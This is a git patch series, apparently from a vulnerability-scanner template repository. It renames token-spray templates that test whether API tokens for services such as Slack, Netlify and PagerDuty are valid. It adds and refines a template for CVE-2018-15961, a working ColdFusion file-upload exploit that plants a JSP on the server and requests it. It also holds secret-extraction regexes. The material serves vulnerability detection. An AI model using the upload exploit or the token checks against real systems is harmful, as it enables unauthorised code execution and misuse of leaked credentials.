'"items":' + - '"created_at":' + condition: and diff --git a/token-spray/mapbox.yaml b/token-spray/api-mapbox.yaml similarity index 71% rename from token-spray/mapbox.yaml rename to token-spray/api-mapbox.yaml index 1e246f783b..4ed5e0648f 100644 --- a/token-spray/mapbox.yaml +++ b/token-spray/api-mapbox.yaml @@ -14,7 +14,10 @@ requests: - "https://api.mapbox.com/geocoding/v5/mapbox.places/Los%20Angeles.json?access_token={{token}}" matchers: - - type: status - status: - - 401 - negative: true + - type: word + part: body + words: + - 'type' + - 'query' + - 'features' + condition: and diff --git a/token-spray/nerdgraph.yaml b/token-spray/api-nerdgraph.yaml similarity index 100% rename from token-spray/nerdgraph.yaml rename to token-spray/api-nerdgraph.yaml index ca570964e4..d367685e7f 100644 --- a/token-spray/nerdgraph.yaml +++ b/token-spray/api-nerdgraph.yaml @@ -3,8 +3,8 @@ id: api-nerdgraph info: name: New Relic NerdGraph API Test author: zzeitlin - reference: https://docs.newrelic.com/docs/apis/nerdgraph/get-started/introduction-new-relic-nerdgraph/ severity: info + reference: https://docs.newrelic.com/docs/apis/nerdgraph/get-started/introduction-new-relic-nerdgraph/ tags: token-spray,newrelic,nerdgraph self-contained: true diff --git a/token-spray/netlify.yaml b/token-spray/api-netlify.yaml similarity index 70% rename from token-spray/netlify.yaml rename to token-spray/api-netlify.yaml index b282f7acd9..e57127c9f5 100644 --- a/token-spray/netlify.yaml +++ b/token-spray/api-netlify.yaml @@ -3,8 +3,8 @@ id: api-netlify info: name: Netlify API Test author: dwisiswant0 - reference: https://docs.netlify.com/api/get-started/ severity: info + reference: https://docs.netlify.com/api/get-started/ tags: token-spray,netlify self-contained: true @@ -16,6 +16,10 @@ requests: Authorization: Bearer {{token}} matchers: - - type: status - status: - - 200 + - type: word + part: body + words: + - '"id":' + - '"premium":' + - '"claimed":' + condition: and diff --git a/token-spray/npm.yaml b/token-spray/api-npm.yaml similarity index 90% rename from token-spray/npm.yaml rename to token-spray/api-npm.yaml index fb0ef0b6b7..522c793520 100644 --- a/token-spray/npm.yaml +++ b/token-spray/api-npm.yaml @@ -3,9 +3,9 @@ id: api-npm info: name: NPM API Test author: zzeitlin - reference: https://docs.npmjs.com/creating-and-viewing-access-tokens severity: info - tags: token-spray,node,npm,package,manager + reference: https://docs.npmjs.com/creating-and-viewing-access-tokens + tags: token-spray,node,npm self-contained: true requests: diff --git a/token-spray/onelogin.yaml b/token-spray/api-onelogin.yaml similarity index 58% rename from token-spray/onelogin.yaml rename to token-spray/api-onelogin.yaml index f57001c5f9..d8369ad80b 100644 --- a/token-spray/onelogin.yaml +++ b/token-spray/api-onelogin.yaml @@ -3,21 +3,25 @@ id: api-onelogin info: name: OneLogin API Test author: dwisiswant0 - reference: https://developers.onelogin.com/api-docs/2/getting-started/dev-overview severity: info + reference: https://developers.onelogin.com/api-docs/2/getting-started/dev-overview tags: token-spray,onelogin self-contained: true requests: - method: GET path: - - "https://api.us.onelogin.com/api/2/users?fields=id" - - "https://api.eu.onelogin.com/api/2/users?fields=id" + - "https://api.us.onelogin.com/api/2/apps" + - "https://api.eu.onelogin.com/api/2/apps" headers: Authorization: Bearer {{token}} stop-at-first-match: true matchers: - - type: status - status: - - 200 + - type: word + part: body + words: + - '"id":' + - '"connector_id":' + - '"auth_method":' + condition: and diff --git a/token-spray/openweather.yaml b/token-spray/api-openweather.yaml similarity index 69% rename from token-spray/openweather.yaml rename to token-spray/api-openweather.yaml index 916936aa97..13a26aecc3 100644 --- a/token-spray/openweather.yaml +++ b/token-spray/api-openweather.yaml @@ -3,8 +3,8 @@ id: api-openweather info: name: OpenWeather API Test author: zzeitlin - reference: https://openweathermap.org/current severity: info + reference: https://openweathermap.org/current tags: token-spray,weather,openweather self-contained: true @@ -14,6 +14,10 @@ requests: - "https://api.openweathermap.org/data/2.5/weather?q=Chicago&appid={{token}}" matchers: - - type: status - status: - - 200 + - type: word + part: body + words: + - '"coord":' + - '"weather":' + - '"base":' + condition: and diff --git a/token-spray/optimizely.yaml b/token-spray/api-optimizely.yaml similarity index 85% rename from token-spray/optimizely.yaml rename to token-spray/api-optimizely.yaml index 8743b893fc..48105d1bec 100644 --- a/token-spray/optimizely.yaml +++ b/token-spray/api-optimizely.yaml @@ -3,8 +3,8 @@ id: api-optimizely info: name: Optimizely API Test author: dwisiswant0 - reference: https://library.optimizely.com/docs/api/app/v2/index.html severity: info + reference: https://library.optimizely.com/docs/api/app/v2/index.html tags: token-spray,optimizely self-contained: true @@ -24,4 +24,6 @@ requests: - type: word part: body words: - - "account_id" + - '"account_id":' + - '"confidence_threshold":' + condition: and \ No newline at end of file diff --git a/token-spray/pagerduty.yaml b/token-spray/api-pagerduty.yaml similarity index 76% rename from token-spray/pagerduty.yaml rename to token-spray/api-pagerduty.yaml index bad59948ed..902fae8ec0 100644 --- a/token-spray/pagerduty.yaml +++ b/token-spray/api-pagerduty.yaml @@ -3,8 +3,8 @@ id: api-pagerduty info: name: Pagerduty API Test author: zzeitlin - reference: https://developer.pagerduty.com/api-reference severity: info + reference: https://developer.pagerduty.com/api-reference tags: token-spray,pagerduty self-contained: true @@ -17,7 +17,9 @@ requests: Authorization: Token token={{token}} matchers: - - type: status - status: - - 401 - negative: true + - type: word + part: body + words: + - '"schedules":' + - '"id":' + condition: and diff --git a/token-spray/paypal.yaml b/token-spray/api-paypal.yaml similarity index 100% rename from token-spray/paypal.yaml rename to token-spray/api-paypal.yaml diff --git a/token-spray/pendo.yaml b/token-spray/api-pendo.yaml similarity index 74% rename from token-spray/pendo.yaml rename to token-spray/api-pendo.yaml index 66cd885dc6..023a6f347c 100644 --- a/token-spray/pendo.yaml +++ b/token-spray/api-pendo.yaml @@ -3,8 +3,8 @@ id: api-pendo info: name: Pendo API Test author: zzeitlin - reference: https://help.pendo.io/resources/support-library/api/index.html severity: info + reference: https://help.pendo.io/resources/support-library/api/index.html tags: token-spray,pendo self-contained: true @@ -12,13 +12,14 @@ requests: - method: GET path: - "https://app.pendo.io/api/v1/feature" - - "https://app.pendo.io/api/v1/metadata/schema/account" headers: Content-Type: application/json X-Pendo-Integration-Key: "{{token}}" matchers: - - type: status - status: - - 403 - negative: true \ No newline at end of file + - type: word + part: body + words: + - '"createdByUser":' + - '"id":' + condition: and \ No newline at end of file diff --git a/token-spray/pivotaltracker.yaml b/token-spray/api-pivotaltracker.yaml similarity index 94% rename from token-spray/pivotaltracker.yaml rename to token-spray/api-pivotaltracker.yaml index d7a74ded66..1f7e7007e0 100644 --- a/token-spray/pivotaltracker.yaml +++ b/token-spray/api-pivotaltracker.yaml @@ -21,3 +21,4 @@ requests: negative: true words: - 'invalid_authentication' + - 'unauthenticated' diff --git a/token-spray/postmark.yaml b/token-spray/api-postmark.yaml similarity index 63% rename from token-spray/postmark.yaml rename to token-spray/api-postmark.yaml index 85367b5c61..b9bec134db 100644 --- a/token-spray/postmark.yaml +++ b/token-spray/api-postmark.yaml @@ -3,20 +3,24 @@ id: api-postmark info: name: PostMark API Test author: zzeitlin - reference: https://postmarkapp.com/developer/api/overview severity: info + reference: https://postmarkapp.com/developer/api/overview tags: token-spray,postmark self-contained: true requests: - method: GET path: - - "https://api.postmarkapp.com/stats/outbound" + - "https://api.postmarkapp.com/server" headers: Accept: application/json X-Postmark-Server-Token: "{{token}}" matchers: - - type: status - status: - - 200 + - type: word + part: body + words: + - '"ID":' + - '"Name":' + - '"ApiTokens":' + condition: and diff --git a/token-spray/sendgrid.yaml b/token-spray/api-sendgrid.yaml similarity index 100% rename from token-spray/sendgrid.yaml rename to token-spray/api-sendgrid.yaml index d9330371f1..3c24d1dfaf 100644 --- a/token-spray/sendgrid.yaml +++ b/token-spray/api-sendgrid.yaml @@ -3,8 +3,8 @@ id: api-sendgrid info: name: Sendgrid API Test author: zzeitlin - reference: https://docs.sendgrid.com/for-developers/sending-email/getting-started-smtp severity: info + reference: https://docs.sendgrid.com/for-developers/sending-email/getting-started-smtp tags: token-spray,sendgrid self-contained: true diff --git a/token-spray/slack.yaml b/token-spray/api-slack.yaml similarity index 80% rename from token-spray/slack.yaml rename to token-spray/api-slack.yaml index 8203aa56b5..d9a36d5801 100644 --- a/token-spray/slack.yaml +++ b/token-spray/api-slack.yaml @@ -19,5 +19,7 @@ requests: - type: word part: body words: - - 'error' - negative: true + - '"url":' + - '"team_id":' + - '"user_id":' + condition: and \ No newline at end of file diff --git a/token-spray/travisci.yaml b/token-spray/api-travisci.yaml similarity index 100% rename from token-spray/travisci.yaml rename to token-spray/api-travisci.yaml index 3b43f9e529..63489fc886 100644 --- a/token-spray/travisci.yaml +++ b/token-spray/api-travisci.yaml @@ -3,8 +3,8 @@ id: api-travisci info: name: Travis CI API Test author: zzeitlin - reference: https://developer.travis-ci.com/ severity: info + reference: https://developer.travis-ci.com/ tags: token-spray,travis self-contained: true From 7e10c6eb426e421f2141df5c2d6461817d72a091 Mon Sep 17 00:00:00 2001 From: ImNightmaree Date: Wed, 10 Nov 2021 17:46:34 +0000 Subject: [PATCH 04/25] Creates CVE-2018-15961 Closes #3119 with minor updates to ensure the file isn't accessible predictably --- cves/2018/CVE-2018-15961 | 40 ++++++++++++++++++++++++++++++++++++++++ 1 file changed, 40 insertions(+) create mode 100644 cves/2018/CVE-2018-15961 diff --git a/cves/2018/CVE-2018-15961 b/cves/2018/CVE-2018-15961 new file mode 100644 index 0000000000..6495051c18 --- /dev/null +++ b/cves/2018/CVE-2018-15961 @@ -0,0 +1,40 @@ +info: + name: CVE-2018-15961 + author: SkyLark-Lab, ImNightmaree + severity: critical + tags: server,cve,cve2018,rce,coldfusion,fileupload + +requests: + - raw: + - | + POST /cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/upload.cfm HTTP/1.1 + Host: {{Hostname}} + Content-Type: multipart/form-data; boundary=---------------------------24464570528145 + + -----------------------------24464570528145 + Content-Disposition: form-data; name="file"; filename="{{randstr}}" + Content-Type: image/jpeg + + %%%%%%%% + -----------------------------24464570528145 + Content-Disposition: form-data; name="path" + + {{randstr}} + -----------------------------24464570528145-- + + + + - method: GET + path: + - "{{BaseURL}}/cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/uploadedFiles/{{randstr}}.jsp" + + matchers-condition: and + matchers: + + - type: word + words: + - "{{randstr}}" + + - type: status + status: + - 200 From 136fd744c9c5a02a4dfe2d089e2b2b4b339de2f0 Mon Sep 17 00:00:00 2001 From: ImNightmaree Date: Wed, 10 Nov 2021 17:51:54 +0000 Subject: [PATCH 05/25] Missed a space on author. --- cves/2018/CVE-2018-15961 | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2018/CVE-2018-15961 b/cves/2018/CVE-2018-15961 index 6495051c18..a529ed82e5 100644 --- a/cves/2018/CVE-2018-15961 +++ b/cves/2018/CVE-2018-15961 @@ -1,6 +1,6 @@ info: name: CVE-2018-15961 - author: SkyLark-Lab, ImNightmaree + author: SkyLark-Lab,ImNightmaree severity: critical tags: server,cve,cve2018,rce,coldfusion,fileupload From 866bcfa0f653f65da2e0bb1ea69fc2b5b653e698 Mon Sep 17 00:00:00 2001 From: Sandeep Singh Date: Wed, 10 Nov 2021 23:23:11 +0530 Subject: [PATCH 06/25] Rename CVE-2018-15961 to CVE-2018-15961.yaml --- cves/2018/{CVE-2018-15961 => CVE-2018-15961.yaml} | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename cves/2018/{CVE-2018-15961 => CVE-2018-15961.yaml} (100%) diff --git a/cves/2018/CVE-2018-15961 b/cves/2018/CVE-2018-15961.yaml similarity index 100% rename from cves/2018/CVE-2018-15961 rename to cves/2018/CVE-2018-15961.yaml From 90c265672fc15a5645bb9bfd95ed5e8f1e6d4368 Mon Sep 17 00:00:00 2001 From: ImNightmaree Date: Wed, 10 Nov 2021 18:00:26 +0000 Subject: [PATCH 07/25] Linting --- cves/2018/CVE-2018-15961.yaml | 1 - 1 file changed, 1 deletion(-) diff --git a/cves/2018/CVE-2018-15961.yaml b/cves/2018/CVE-2018-15961.yaml index a529ed82e5..539651ca46 100644 --- a/cves/2018/CVE-2018-15961.yaml +++ b/cves/2018/CVE-2018-15961.yaml @@ -3,7 +3,6 @@ info: author: SkyLark-Lab,ImNightmaree severity: critical tags: server,cve,cve2018,rce,coldfusion,fileupload - requests: - raw: - | From 03c24bd12d8623cfd8b3fc4fd370a3c8a1cf3444 Mon Sep 17 00:00:00 2001 From: ImNightmaree Date: Wed, 10 Nov 2021 18:02:59 +0000 Subject: [PATCH 08/25] Linting --- cves/2018/CVE-2018-15961.yaml | 28 +++++++++++++--------------- 1 file changed, 13 insertions(+), 15 deletions(-) diff --git a/cves/2018/CVE-2018-15961.yaml b/cves/2018/CVE-2018-15961.yaml index 539651ca46..f36246b29d 100644 --- a/cves/2018/CVE-2018-15961.yaml +++ b/cves/2018/CVE-2018-15961.yaml @@ -3,26 +3,24 @@ info: author: SkyLark-Lab,ImNightmaree severity: critical tags: server,cve,cve2018,rce,coldfusion,fileupload + requests: - raw: - - | - POST /cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/upload.cfm HTTP/1.1 - Host: {{Hostname}} - Content-Type: multipart/form-data; boundary=---------------------------24464570528145 - - -----------------------------24464570528145 - Content-Disposition: form-data; name="file"; filename="{{randstr}}" - Content-Type: image/jpeg - - %%%%%%%% - -----------------------------24464570528145 - Content-Disposition: form-data; name="path" - - {{randstr}} - -----------------------------24464570528145-- + - | + POST /cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/upload.cfm HTTP/1.1 + Host: {{Hostname}} + Content-Type: multipart/form-data; boundary=---------------------------24464570528145 + -----------------------------24464570528145 + Content-Disposition: form-data; name="file"; filename="{{randstr}}" + Content-Type: image/jpeg + %%%%%%%% + -----------------------------24464570528145 + Content-Disposition: form-data; name="path" + {{randstr}} + -----------------------------24464570528145-- - method: GET path: - "{{BaseURL}}/cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/uploadedFiles/{{randstr}}.jsp" From 3852eedb4628f0f6c99da29b3984e1ce978ddf39 Mon Sep 17 00:00:00 2001 From: ImNightmaree Date: Wed, 10 Nov 2021 18:05:59 +0000 Subject: [PATCH 09/25] Linting --- cves/2018/CVE-2018-15961.yaml | 4 +++- 1 file changed, 3 insertions(+), 1 deletion(-) diff --git a/cves/2018/CVE-2018-15961.yaml b/cves/2018/CVE-2018-15961.yaml index f36246b29d..fef6b1da6d 100644 --- a/cves/2018/CVE-2018-15961.yaml +++ b/cves/2018/CVE-2018-15961.yaml @@ -1,9 +1,11 @@ +id:CVE-2018-15961 + info: name: CVE-2018-15961 author: SkyLark-Lab,ImNightmaree severity: critical tags: server,cve,cve2018,rce,coldfusion,fileupload - + requests: - raw: - | From 40e6c30e0d7084c507e6947510b1807febf9a6b6 Mon Sep 17 00:00:00 2001 From: ImNightmaree Date: Wed, 10 Nov 2021 18:08:18 +0000 Subject: [PATCH 10/25] Linting --- cves/2018/CVE-2018-15961.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2018/CVE-2018-15961.yaml b/cves/2018/CVE-2018-15961.yaml index fef6b1da6d..ec9955c574 100644 --- a/cves/2018/CVE-2018-15961.yaml +++ b/cves/2018/CVE-2018-15961.yaml @@ -1,4 +1,4 @@ -id:CVE-2018-15961 +id: CVE-2018-15961 info: name: CVE-2018-15961 From 8f8888481d4952efcbb90697e75a7d9d1a4a4014 Mon Sep 17 00:00:00 2001 From: ImNightmaree Date: Wed, 10 Nov 2021 18:14:05 +0000 Subject: [PATCH 12/25] Linting --- cves/2018/CVE-2018-15961.yaml | 27 +++++++++++++-------------- 1 file changed, 13 insertions(+), 14 deletions(-) diff --git a/cves/2018/CVE-2018-15961.yaml b/cves/2018/CVE-2018-15961.yaml index ec9955c574..8debd1d9e8 100644 --- a/cves/2018/CVE-2018-15961.yaml +++ b/cves/2018/CVE-2018-15961.yaml @@ -6,23 +6,23 @@ info: severity: critical tags: server,cve,cve2018,rce,coldfusion,fileupload -requests: +requests: - raw: - - | - POST /cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/upload.cfm HTTP/1.1 - Host: {{Hostname}} - Content-Type: multipart/form-data; boundary=---------------------------24464570528145 + - | + POST /cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/upload.cfm HTTP/1.1 + Host: {{Hostname}} + Content-Type: multipart/form-data; boundary=---------------------------24464570528145 - -----------------------------24464570528145 - Content-Disposition: form-data; name="file"; filename="{{randstr}}" - Content-Type: image/jpeg + -----------------------------24464570528145 + Content-Disposition: form-data; name="file"; filename="{{randstr}}" + Content-Type: image/jpeg - %%%%%%%% - -----------------------------24464570528145 - Content-Disposition: form-data; name="path" + %%%%%%%% + -----------------------------24464570528145 + Content-Disposition: form-data; name="path" - {{randstr}} - -----------------------------24464570528145-- + {{randstr}} + -----------------------------24464570528145-- - method: GET path: - "{{BaseURL}}/cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/uploadedFiles/{{randstr}}.jsp" @@ -33,7 +33,6 @@ requests: - type: word words: - "{{randstr}}" - - type: status status: - 200 From 6b896965a153e1bd04b9973f3b802716610deb47 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Thu, 11 Nov 2021 11:51:24 +0530 Subject: [PATCH 13/25] Update CVE-2018-15961.yaml --- cves/2018/CVE-2018-15961.yaml | 16 +++++++++++----- 1 file changed, 11 insertions(+), 5 deletions(-) diff --git a/cves/2018/CVE-2018-15961.yaml b/cves/2018/CVE-2018-15961.yaml index 8debd1d9e8..15dd4b5ea2 100644 --- a/cves/2018/CVE-2018-15961.yaml +++ b/cves/2018/CVE-2018-15961.yaml @@ -4,7 +4,10 @@ info: name: CVE-2018-15961 author: SkyLark-Lab,ImNightmaree severity: critical - tags: server,cve,cve2018,rce,coldfusion,fileupload + reference: + - https://github.com/vah13/CVE-2018-15961 + - https://www.cvedetails.com/cve/CVE-2018-15961/ + tags: adobe,cve,cve2018,rce,coldfusion,fileupload requests: - raw: @@ -14,15 +17,16 @@ requests: Content-Type: multipart/form-data; boundary=---------------------------24464570528145 -----------------------------24464570528145 - Content-Disposition: form-data; name="file"; filename="{{randstr}}" + Content-Disposition: form-data; name="file"; filename="{{randstr}}.jsp" Content-Type: image/jpeg - %%%%%%%% + <%int x,y;x=Integer.parseInt("9090873");y=Integer.parseInt("9097878");out.print(x+y);%> -----------------------------24464570528145 Content-Disposition: form-data; name="path" - {{randstr}} + {{randstr}}.jsp -----------------------------24464570528145-- + - method: GET path: - "{{BaseURL}}/cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/uploadedFiles/{{randstr}}.jsp" @@ -31,8 +35,10 @@ requests: matchers: - type: word + part: body words: - - "{{randstr}}" + - "18188751" + - type: status status: - 200 From 33a733d4f63f90a722cf3b0ef69de12bdacf977e Mon Sep 17 00:00:00 2001 From: sandeep Date: Thu, 11 Nov 2021 15:05:31 +0530 Subject: [PATCH 14/25] misc updates --- cves/2018/CVE-2018-15961.yaml | 36 +++++++++++++++++++++++++---------- 1 file changed, 26 insertions(+), 10 deletions(-) diff --git a/cves/2018/CVE-2018-15961.yaml b/cves/2018/CVE-2018-15961.yaml index 15dd4b5ea2..3055bdfd6f 100644 --- a/cves/2018/CVE-2018-15961.yaml +++ b/cves/2018/CVE-2018-15961.yaml @@ -1,13 +1,14 @@ id: CVE-2018-15961 info: - name: CVE-2018-15961 + name: Adobe ColdFusion Unrestricted file upload RCE author: SkyLark-Lab,ImNightmaree severity: critical + description: Adobe ColdFusion versions July 12 release (2018.0.0.310739), Update 6 and earlier, and Update 14 and earlier have an unrestricted file upload vulnerability. Successful exploitation could lead to arbitrary code execution. reference: - - https://github.com/vah13/CVE-2018-15961 - - https://www.cvedetails.com/cve/CVE-2018-15961/ - tags: adobe,cve,cve2018,rce,coldfusion,fileupload + - https://nvd.nist.gov/vuln/detail/CVE-2018-15961 + - https://github.com/xbufu/CVE-2018-15961 + tags: cve,cve2018,adobe,rce,coldfusion,fileupload requests: - raw: @@ -20,24 +21,39 @@ requests: Content-Disposition: form-data; name="file"; filename="{{randstr}}.jsp" Content-Type: image/jpeg - <%int x,y;x=Integer.parseInt("9090873");y=Integer.parseInt("9097878");out.print(x+y);%> + <%@ page import="java.util.*,java.io.*"%> + <%@ page import="java.security.MessageDigest"%> + <% + String cve = "CVE-2018-15961"; + MessageDigest alg = MessageDigest.getInstance("MD5"); + alg.reset(); + alg.update(cve.getBytes()); + byte[] digest = alg.digest(); + StringBuffer hashedpasswd = new StringBuffer(); + String hx; + for (int i=0;i -----------------------------24464570528145 Content-Disposition: form-data; name="path" {{randstr}}.jsp -----------------------------24464570528145-- - - method: GET - path: - - "{{BaseURL}}/cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/uploadedFiles/{{randstr}}.jsp" + - | + GET /cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/uploadedFiles/{{randstr}}.jsp HTTP/1.1 + Host: {{Hostname}} matchers-condition: and matchers: - type: word - part: body words: - - "18188751" + - "ddbb3e76f92e78c445c8ecb392beb225" # MD5 of CVE-2018-15961 - type: status status: From f47fca558a468053c008a185a20696c98548d9ce Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 11 Nov 2021 11:06:36 +0000 Subject: [PATCH 15/25] Auto Generated CVE annotations [Thu Nov 11 11:06:36 UTC 2021] :robot: --- cves/2018/CVE-2018-15961.yaml | 5 +++++ 1 file changed, 5 insertions(+) diff --git a/cves/2018/CVE-2018-15961.yaml b/cves/2018/CVE-2018-15961.yaml index 3055bdfd6f..6e393a310c 100644 --- a/cves/2018/CVE-2018-15961.yaml +++ b/cves/2018/CVE-2018-15961.yaml @@ -9,6 +9,11 @@ info: - https://nvd.nist.gov/vuln/detail/CVE-2018-15961 - https://github.com/xbufu/CVE-2018-15961 tags: cve,cve2018,adobe,rce,coldfusion,fileupload + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2018-15961 + cwe-id: CWE-434 requests: - raw: From ff1bfd8ed8d92d574e925a22d8945c5d06f75009 Mon Sep 17 00:00:00 2001 From: sandeep Date: Thu, 11 Nov 2021 20:32:39 +0530 Subject: [PATCH 16/25] misc update --- token-spray/{square.yaml => api-square.yaml} | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename token-spray/{square.yaml => api-square.yaml} (100%) diff --git a/token-spray/square.yaml b/token-spray/api-square.yaml similarity index 100% rename from token-spray/square.yaml rename to token-spray/api-square.yaml From 02ad4e81b0c2bcc6711da9f5b806c31bcd9921a3 Mon Sep 17 00:00:00 2001 From: Sullo Date: Thu, 11 Nov 2021 11:13:45 -0500 Subject: [PATCH 17/25] Removing misconfiguration/phpmyadmin/phpmyadmin-setup.yaml in favor of miscellaneous/phpmyadmin-setup.yaml --- .../phpmyadmin/phpmyadmin-setup.yaml | 17 ----------------- 1 file changed, 17 deletions(-) delete mode 100644 misconfiguration/phpmyadmin/phpmyadmin-setup.yaml diff --git a/misconfiguration/phpmyadmin/phpmyadmin-setup.yaml b/misconfiguration/phpmyadmin/phpmyadmin-setup.yaml deleted file mode 100644 index 2485003909..0000000000 --- a/misconfiguration/phpmyadmin/phpmyadmin-setup.yaml +++ /dev/null @@ -1,17 +0,0 @@ -id: phpmyadmin-setup - -info: - name: phpMyAdmin setup page - author: thevillagehacker - severity: medium - tags: phpmyadmin - reference: https://hackerone.com/reports/297339 - -requests: - - method: GET - path: - - "{{BaseURL}}/phpmyadmin/setup/index.php" - matchers: - - type: word - words: - - "phpMyAdmin setup" From e43e20880d9218a97c45a1c6069c4d77fb2e5074 Mon Sep 17 00:00:00 2001 From: Sullo Date: Thu, 11 Nov 2021 11:14:21 -0500 Subject: [PATCH 18/25] Move miscellaneous/phpmyadmin-setup.yaml to misconfiguration/phpmyadmin/phpmyadmin-setup.yaml --- .../phpmyadmin}/phpmyadmin-setup.yaml | 5 ++++- 1 file changed, 4 insertions(+), 1 deletion(-) rename {miscellaneous => misconfiguration/phpmyadmin}/phpmyadmin-setup.yaml (86%) diff --git a/miscellaneous/phpmyadmin-setup.yaml b/misconfiguration/phpmyadmin/phpmyadmin-setup.yaml similarity index 86% rename from miscellaneous/phpmyadmin-setup.yaml rename to misconfiguration/phpmyadmin/phpmyadmin-setup.yaml index 72870b91b5..7ab271dc14 100644 --- a/miscellaneous/phpmyadmin-setup.yaml +++ b/misconfiguration/phpmyadmin/phpmyadmin-setup.yaml @@ -17,6 +17,7 @@ requests: - "{{BaseURL}}/web/phpmyadmin/scripts/setup.php" - "{{BaseURL}}/xampp/phpmyadmin/scripts/setup.php" - "{{BaseURL}}/sysadmin/phpMyAdmin/scripts/setup.php" + - "{{BaseURL}}/phpmyadmin/setup/index.php" stop-at-first-match: true matchers-condition: and @@ -24,7 +25,9 @@ requests: - type: word words: - "You want to configure phpMyAdmin using web interface" + - "phpMyAdmin setup" + condition: or - type: status status: - - 200 \ No newline at end of file + - 200 From 7bbb9de4843b71117bc4c423487985a45e4fd5cd Mon Sep 17 00:00:00 2001 From: Sullo Date: Thu, 11 Nov 2021 11:15:39 -0500 Subject: [PATCH 19/25] correct template id name collisions --- file/keys/credential-exposure.yaml | 2 +- file/keys/google-api.yaml | 4 ++-- file/keys/sendgrid-api.yaml | 4 ++-- token-spray/google-placedetails.yaml | 2 +- 4 files changed, 6 insertions(+), 6 deletions(-) diff --git a/file/keys/credential-exposure.yaml b/file/keys/credential-exposure.yaml index 40b98b7fab..71ed00a1ab 100644 --- a/file/keys/credential-exposure.yaml +++ b/file/keys/credential-exposure.yaml @@ -1,4 +1,4 @@ -id: credentials-disclosure +id: credentials-disclosure-file # Extract secrets regex like api keys, password, token, etc ... for different services # Always validate the leaked key/tokens/passwords to make sure it's valid, a token/keys without any impact is not an valid issue. diff --git a/file/keys/google-api.yaml b/file/keys/google-api.yaml index c227c5263b..8fc2776945 100644 --- a/file/keys/google-api.yaml +++ b/file/keys/google-api.yaml @@ -1,4 +1,4 @@ -id: google-api-key +id: google-api-key-file info: name: Google API key @@ -13,4 +13,4 @@ file: extractors: - type: regex regex: - - "AIza[0-9A-Za-z\\-_]{35}" \ No newline at end of file + - "AIza[0-9A-Za-z\\-_]{35}" diff --git a/file/keys/sendgrid-api.yaml b/file/keys/sendgrid-api.yaml index cf01b33d17..4b5c0e3c65 100644 --- a/file/keys/sendgrid-api.yaml +++ b/file/keys/sendgrid-api.yaml @@ -1,4 +1,4 @@ -id: sendgrid-api-key +id: sendgrid-api-key-file info: name: Sendgrid API Key @@ -13,4 +13,4 @@ file: extractors: - type: regex regex: - - "SG\\.[a-zA-Z0-9]{22}\\.[a-zA-Z0-9]{43}" \ No newline at end of file + - "SG\\.[a-zA-Z0-9]{22}\\.[a-zA-Z0-9]{43}" diff --git a/token-spray/google-placedetails.yaml b/token-spray/google-placedetails.yaml index 2f6cf7d464..b8605b6dde 100644 --- a/token-spray/google-placedetails.yaml +++ b/token-spray/google-placedetails.yaml @@ -1,4 +1,4 @@ -id: api-googlespeedlimit +id: api-google-place-details info: name: Google Place Details API Test From 878a74647ccd8949a3ebbcb78727678560becd5f Mon Sep 17 00:00:00 2001 From: sandeep Date: Thu, 11 Nov 2021 22:04:45 +0530 Subject: [PATCH 20/25] misc updates --- .../{pma-server-import.yaml => phpmyadmin-server-import.yaml} | 0 misconfiguration/phpmyadmin/phpmyadmin-setup.yaml | 4 ++-- misconfiguration/phpmyadmin/phpmyadmin-sql.php-server.yaml | 2 ++ 3 files changed, 4 insertions(+), 2 deletions(-) rename misconfiguration/phpmyadmin/{pma-server-import.yaml => phpmyadmin-server-import.yaml} (100%) diff --git a/misconfiguration/phpmyadmin/pma-server-import.yaml b/misconfiguration/phpmyadmin/phpmyadmin-server-import.yaml similarity index 100% rename from misconfiguration/phpmyadmin/pma-server-import.yaml rename to misconfiguration/phpmyadmin/phpmyadmin-server-import.yaml diff --git a/misconfiguration/phpmyadmin/phpmyadmin-setup.yaml b/misconfiguration/phpmyadmin/phpmyadmin-setup.yaml index 7ab271dc14..383a94ea63 100644 --- a/misconfiguration/phpmyadmin/phpmyadmin-setup.yaml +++ b/misconfiguration/phpmyadmin/phpmyadmin-setup.yaml @@ -2,9 +2,9 @@ id: phpmyadmin-setup info: name: Publicly Accessible Phpmyadmin Setup - author: sheikhrishad + author: sheikhrishad,thevillagehacker severity: medium - tags: misc + tags: phpmyadmin,misconfig requests: - method: GET diff --git a/misconfiguration/phpmyadmin/phpmyadmin-sql.php-server.yaml b/misconfiguration/phpmyadmin/phpmyadmin-sql.php-server.yaml index 0bb3cbb91c..fecbccc2c1 100644 --- a/misconfiguration/phpmyadmin/phpmyadmin-sql.php-server.yaml +++ b/misconfiguration/phpmyadmin/phpmyadmin-sql.php-server.yaml @@ -14,6 +14,7 @@ requests: - "{{BaseURL}}/phpmyadmin/index.php?db=information_schema" - "{{BaseURL}}/phpMyAdmin/index.php?db=information_schema" + stop-at-first-match: true matchers-condition: and matchers: - type: word @@ -21,6 +22,7 @@ requests: - "var db = 'information_schema';" - "var opendb_url = 'db_structure.php';" condition: and + - type: status status: - 200 From 65ce478c0ec4019c4d6169a289cf52fd283a22fb Mon Sep 17 00:00:00 2001 From: sandeep Date: Thu, 11 Nov 2021 22:59:29 +0530 Subject: [PATCH 21/25] misc updates --- cves/2017/CVE-2017-15944.yaml | 4 ++-- cves/2018/CVE-2018-10141.yaml | 8 ++++---- default-logins/paloalto/panos-default-login.yaml | 6 +++--- exposed-panels/globalprotect-panel.yaml | 3 ++- 4 files changed, 11 insertions(+), 10 deletions(-) diff --git a/cves/2017/CVE-2017-15944.yaml b/cves/2017/CVE-2017-15944.yaml index 41f4f5c82f..48553abee3 